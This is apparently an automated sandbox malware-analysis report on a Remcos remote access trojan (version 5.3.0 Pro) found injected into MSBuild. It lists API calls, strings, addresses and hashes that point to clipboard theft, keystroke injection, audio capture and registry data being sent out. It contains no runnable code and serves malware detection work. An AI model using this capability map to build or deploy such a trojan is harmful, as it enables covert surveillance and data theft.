Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
• String ID: XCG$`=G$x=G
• API String ID: 1356121797-903574159
• Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
• Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
• Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
• Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
• lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
• Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
• TranslateMessage.USER32(?), ref: 0041C9FB
• DispatchMessageA.USER32(?), ref: 0041CA05
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
• String ID: Remcos
• API String ID: 1970332568-165870891
• Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
• Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
• Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
• Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c66e7b394ba3cedc2256576aca990ac76a61b28af5954af531c93a6943a32a1c
• Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
• Opcode Fuzzy Hash: c66e7b394ba3cedc2256576aca990ac76a61b28af5954af531c93a6943a32a1c
• Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
                                                                                                                                            • API String ID: 1454806937-0
                                                                                                                                            • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                            • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                            • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                            • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: tcp$udp
                                                                                                                                            • API String ID: 0-3725065008
                                                                                                                                            • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                            • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                                                            • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                            • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                            • _free.LIBCMT ref: 00444086
                                                                                                                                            • _free.LIBCMT ref: 0044409D
                                                                                                                                            • _free.LIBCMT ref: 004440BC
                                                                                                                                            • _free.LIBCMT ref: 004440D7
                                                                                                                                            • _free.LIBCMT ref: 004440EE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$AllocateHeap
                                                                                                                                            • String ID: J7D$u;~/
                                                                                                                                            • API String ID: 3033488037-3281933603
                                                                                                                                            • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                            • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                                                            • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                            • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                                                            APIs
                                                                                                                                            • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                            • String ID: T=G$p[G$>G$>G
                                                                                                                                            • API String ID: 1596592924-2461731529
                                                                                                                                            • Opcode ID: 03a186512c6701b29411dcb5ad7ed2e07cbc7342fcb7f914bbe2927d5dc56238
                                                                                                                                            • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                                                            • Opcode Fuzzy Hash: 03a186512c6701b29411dcb5ad7ed2e07cbc7342fcb7f914bbe2927d5dc56238
                                                                                                                                            • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm$u;~/
                                                                                                                                            • API String ID: 1170836740-2003853416
                                                                                                                                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                            • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                                                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                            • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                                              • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                                              • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                            • String ID: .part
                                                                                                                                            • API String ID: 1303771098-3499674018
                                                                                                                                            • Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                                            • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                                                            • Opcode Fuzzy Hash: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                                            • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                                              • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                                              • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                              • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                            • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                            • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                            • API String ID: 3286818993-703403762
                                                                                                                                            • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
• Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
• Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
• Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
APIs
• AllocConsole.KERNEL32(00474358), ref: 0041BEB9
• GetConsoleWindow.KERNEL32 ref: 0041BEBF
• ShowWindow.USER32(00000000,00000000), ref: 0041BED2
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Console$Window$AllocOutputShow
• String ID: Remcos v$5.3.0 Pro$CONOUT$
• API String ID: 4067487056-2527699604
• Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
• Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
• Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
• Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
APIs
• SendInput.USER32 ref: 00418B08
• SendInput.USER32(00000001,?,0000001C), ref: 00418B30
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
• SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: InputSend$Virtual
• String ID:
• API String ID: 1167301434-0
• Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
• Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
• Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
• Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
APIs
• OpenClipboard.USER32 ref: 00415A46
• EmptyClipboard.USER32 ref: 00415A54
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID:
• API String ID: 2172192267-0
• Opcode ID: a4bc90c7b42ad257af3d3a405f0387b9fe529ea6a62e82e0e8fb23c7bb9faa15
• Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
• Opcode Fuzzy Hash: a4bc90c7b42ad257af3d3a405f0387b9fe529ea6a62e82e0e8fb23c7bb9faa15
• Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: __freea$__alloca_probe_16
• String ID: a/p$am/pm$u;~/
• API String ID: 3509577899-3369845873
• Opcode ID: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
• Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
• Opcode Fuzzy Hash: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
• Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID: u;~/
• API String ID: 0-1979702588
• Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
• Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
• Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
• Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
• Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
• Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
• Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
• __fassign.LIBCMT ref: 1000954F
• __fassign.LIBCMT ref: 1000956A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
• WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
• WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
• Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
• Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
• Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: HE$HE
• API String ID: 269201875-1978648262
• Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
• Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
• Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
• Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
APIs
• RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
• RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseEnumInfoOpenQuerysend
• String ID: TUFTUF$>G$DG$DG
• API String ID: 3114080316-344394840
• Opcode ID: c7dacded70064eff084c5483823ad627ae37bda4e5083f92a4c54b5f216bc74c
• Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
• Opcode Fuzzy Hash: c7dacded70064eff084c5483823ad627ae37bda4e5083f92a4c54b5f216bc74c
• Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: u;~/
• API String ID: 269201875-1979702588
• Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
